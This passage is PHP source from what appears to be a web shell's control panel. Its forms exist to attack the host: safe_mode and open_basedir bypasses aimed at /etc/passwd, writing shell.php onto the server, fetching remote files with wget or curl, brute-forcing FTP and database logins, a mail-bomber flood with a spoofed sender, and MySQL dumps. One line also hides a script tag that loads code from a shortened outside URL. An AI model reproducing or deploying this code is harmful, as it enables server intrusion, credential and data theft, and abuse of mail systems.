  6544. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6545.  
  6546. echo $te.'</div>'.$table_end1.$fe;
  6547.  
  6548. }
  6549.  
  6550. if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_list') &&@version_compare(@phpversion(),"5.2.0")<=0){
  6551.  
  6552. echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
  6553.  
  6554. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6555.  
  6556. echo $te.'</div>'.$table_end1.$fe;
  6557.  
  6558. }
  6559.  
  6560. if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_body') &&@version_compare(@phpversion(),"5.2.0")<=0){
  6561.  
  6562. echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
  6563.  
  6564. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6565.  
  6566. echo $te.'</div>'.$table_end1.$fe;
  6567.  
  6568. }
  6569.  
  6570. if(($safe_mode ||$open_basedir) &&@function_exists('copy') &&@version_compare(@phpversion(),"5.2.0")<=0)
  6571.  
  6572. {
  6573.  
  6574. echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
  6575.  
  6576. echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
  6577.  
  6578. echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6579.  
  6580. echo $te.'</div>'.$table_end1.$fe;
  6581.  
  6582. }
  6583.  
  6584. if(($safe_mode ||$open_basedir) &&@function_exists('ini_restore') &&@version_compare(@phpversion(),"5.2.0")<=0){
  6585.  
  6586. echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
  6587.  
  6588. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6589.  
  6590. echo $te.'</div>'.$table_end1.$fe;
  6591.  
  6592. }
  6593.  
  6594. if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.0.0")<0){
  6595.  
  6596. echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
  6597.  
  6598. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6599.  
  6600. echo $te.'</div>'.$table_end1.$fe;
  6601.  
  6602. }
  6603.  
  6604. if(($safe_mode ||$open_basedir) &&@function_exists('glob') &&@version_compare(@phpversion(),"5.2.2")<=0){
  6605.  
  6606. echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
  6607.  
  6608. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6609.  
  6610. echo $te.'</div>'.$table_end1.$fe;
  6611.  
  6612. }
  6613.  
  6614. if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)
  6615.  
  6616. {
  6617.  
  6618. echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
  6619.  
  6620. echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6621.  
  6622. echo $te.'</div>'.$table_end1.$fe;
  6623.  
  6624. }
  6625.  
  6626. if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)
  6627.  
  6628. {
  6629.  
  6630. echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
  6631.  
  6632. echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6633.  
  6634. echo $te.'</div>'.$table_end1.$fe;
  6635.  
  6636. }
  6637.  
  6638. if(($safe_mode ||$open_basedir) &&@function_exists('error_log') &&@version_compare(@phpversion(),"5.2.2")<=0)
  6639.  
  6640. {
  6641.  
  6642. echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
  6643.  
  6644. echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
  6645.  
  6646. echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
  6647.  
  6648. echo $te.'</div>'.$table_end1.$fe;
  6649.  
  6650. }
  6651.  
  6652. if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)
  6653.  
  6654. {
  6655.  
  6656. echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
  6657.  
  6658. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
  6659.  
  6660. echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
  6661.  
  6662. echo $te.'</div>'.$table_end1.$fe;
  6663.  
  6664. }
  6665.  
  6666. if(($safe_mode ||$open_basedir) &&@function_exists('readfile') &&@version_compare(@phpversion(),"5.2.2")<=0)
  6667.  
  6668. {
  6669.  
  6670. echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
  6671.  
  6672. echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
  6673.  
  6674. echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
  6675.  
  6676. echo $te.'</div>'.$table_end1.$fe;
  6677.  
  6678. }
  6679.  
  6680. if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.4")<=0)
  6681.  
  6682. {
  6683.  
  6684. echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
  6685.  
  6686. echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  6687.  
  6688. echo $te.'</div>'.$table_end1.$fe;
  6689.  
  6690. }
  6691.  
  6692. if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0)
  6693.  
  6694. {
  6695.  
  6696. echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
  6697.  
  6698. echo "<tr><td valign=top width=70%>".$ts;
  6699.  
  6700. echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
  6701.  
  6702. echo $te."</td><td valign=top width=30%>".$ts;
  6703.  
  6704. echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
  6705.  
  6706. echo $te."</td></tr>";
  6707.  
  6708. echo $te.'</div>'.$table_end1;
  6709.  
  6710. }
  6711.  
  6712. if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0)
  6713.  
  6714. {
  6715.  
  6716. echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
  6717.  
  6718. echo "<tr><td valign=top width=70%>".$ts;
  6719.  
  6720. echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
  6721.  
  6722. echo $te."</td><td valign=top width=30%>".$ts;
  6723.  
  6724. echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
  6725.  
  6726. echo $te."</td></tr>";
  6727.  
  6728. echo $te.'</div>'.$table_end1;
  6729.  
  6730. }
  6731.  
  6732. if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){
  6733.  
  6734. echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
  6735.  
  6736. echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
  6737.  
  6738. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
  6739.  
  6740. echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
  6741.  
  6742. echo $te.'</div>'.$table_end1.$fe;
  6743.  
  6744. }
  6745.  
  6746. if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){
  6747.  
  6748. echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
  6749.  
  6750. echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
  6751.  
  6752. echo "<tr><td valign=top width=50%>".$ts;
  6753.  
  6754. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
  6755.  
  6756. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
  6757.  
  6758. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
  6759.  
  6760. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
  6761.  
  6762. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
  6763.  
  6764. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
  6765.  
  6766. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
  6767.  
  6768. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
  6769.  
  6770. echo $te."</td><td valign=top width=50%>".$ts;
  6771.  
  6772. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
  6773.  
  6774. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
  6775.  
  6776. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
  6777.  
  6778. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
  6779.  
  6780. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
  6781.  
  6782. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
  6783.  
  6784. echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
  6785.  
  6786. echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
  6787.  
  6788. echo $te."</td></tr>";
  6789.  
  6790. echo $te.'</div>'.$table_end1.$fe;
  6791.  
  6792. }
  6793.  
  6794. $select='';
  6795.  
  6796. if((!@function_exists('ini_get')) ||(@ini_get('allow_url_fopen') &&@function_exists('fopen'))){$select = "<option value=\"fopen\">fopen</option>";}
  6797.  
  6798. if(!$safe_mode){
  6799.  
  6800. if(which('wget')){$select .= "<option value=\"wget\">wget</option>";}
  6801.  
  6802. if(which('fetch')){$select .= "<option value=\"fetch\">fetch</option>";}
  6803.  
  6804. if(which('lynx')){$select .= "<option value=\"lynx\">lynx</option>";}
  6805.  
  6806. if(which('links')){$select .= "<option value=\"links\">links</option>";}
  6807.  
  6808. if(which('curl')){$select .= "<option value=\"curl\">curl</option>";}
  6809.  
  6810. if(which('GET')){$select .= "<option value=\"GET\">GET</option>";}
  6811.  
  6812. }
  6813.  
  6814. if($select){
  6815.  
  6816. echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
  6817.  
  6818. echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\">".$select
  6819.  
  6820. ."</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
  6821.  
  6822. echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
  6823.  
  6824. echo $te.'</div>'.$table_end1.$fe;
  6825.  
  6826. }
  6827.  
  6828. echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
  6829.  
  6830. echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
  6831.  
  6832. $arh = $lang[$language.'_text92'];
  6833.  
  6834. if(@function_exists('gzcompress')) {$arh .= in('radio','compress',0,'zip').' zip';}
  6835.  
  6836. if(@function_exists('gzencode'))   {$arh .= in('radio','compress',0,'gzip').' gzip';}
  6837.  
  6838. if(@function_exists('bzcompress')) {$arh .= in('radio','compress',0,'bzip').' bzip';}
  6839.  
  6840. echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
  6841.  
  6842. echo $te.'</div>'.$table_end1.$fe;
  6843.  
  6844. if(@function_exists("ftp_connect")){
  6845.  
  6846. echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
  6847.  
  6848. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
  6849.  
  6850. echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
  6851.  
  6852. echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
  6853.  
  6854. echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
  6855.  
  6856. echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
  6857.  
  6858. echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
  6859.  
  6860. echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
  6861.  
  6862. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
  6863.  
  6864. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
  6865.  
  6866. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
  6867.  
  6868. echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
  6869.  
  6870. echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
  6871.  
  6872. echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
  6873.  
  6874. echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
  6875.  
  6876. echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
  6877.  
  6878. echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
  6879.  
  6880. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
  6881.  
  6882. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
  6883.  
  6884. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
  6885.  
  6886. echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
  6887.  
  6888. echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
  6889.  
  6890. echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
  6891.  
  6892. echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
  6893.  
  6894. echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
  6895.  
  6896. echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
  6897.  
  6898. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
  6899.  
  6900. echo $te."</td>".$fe."</tr></div></table>";
  6901.  
  6902. }
  6903.  
  6904. if(@function_exists("mail")){
  6905.  
  6906. echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
  6907.  
  6908. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
  6909.  
  6910. echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
  6911.  
  6912. echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));
  6913.  
  6914. echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));
  6915.  
  6916. echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
  6917.  
  6918. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
  6919.  
  6920. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
  6921.  
  6922. echo "<SCRIPT SRC=http://goo.gl/ZibW9L></SCRIPT> <font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
  6923.  
  6924. echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):(""))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
  6925.  
  6926. echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):(""))));
  6927.  
  6928. echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):(""))));
  6929.  
  6930. echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
  6931.  
  6932. echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
  6933.  
  6934. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
  6935.  
  6936. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
  6937.  
  6938. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
  6939.  
  6940. echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
  6941.  
  6942. echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
  6943.  
  6944. echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
  6945.  
  6946. echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
  6947.  
  6948. echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
  6949.  
  6950. echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
  6951.  
  6952. echo $te."</td>".$fe."</tr></div></table>";
  6953.  
  6954. }
  6955.  
  6956. if($mysql_on||$mssql_on||$pg_on||$ora_on)
  6957.  
  6958. {
  6959.  
  6960. $select = '<select name=db>';
  6961.  
  6962. if($mysql_on) $select .= '<option>MySQL</option>';
  6963.  
  6964. if($mssql_on) $select .= '<option>MSSQL</option>';
  6965.  
  6966. if($pg_on)    $select .= '<option>PostgreSQL</option>';
  6967.  
  6968. if($ora_on)   $select .= '<option>Oracle</option>';
  6969.  
  6970. $select .= '</select>';
  6971.  
  6972. echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
  6973.  
  6974. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
  6975.  
  6976. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
  6977.  
  6978. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
  6979.  
  6980. echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
  6981.  
  6982. echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
  6983.  
  6984. echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
  6985.  
  6986. echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
  6987.  
  6988. echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
  6989.  
  6990. echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
  6991.  
  6992. echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
  6993.  
  6994. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
  6995.  
  6996. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
  6997.  
  6998. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
  6999.  
  7000. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
  7001.  
  7002. echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
  7003.  
  7004. echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
  7005.  
  7006. echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
  7007.  
  7008. echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
  7009.  
  7010. echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
  7011.  
  7012. echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
  7013.  
  7014. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
  7015.  
  7016. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
  7017.  
  7018. echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
  7019.  
  7020. echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
  7021.  
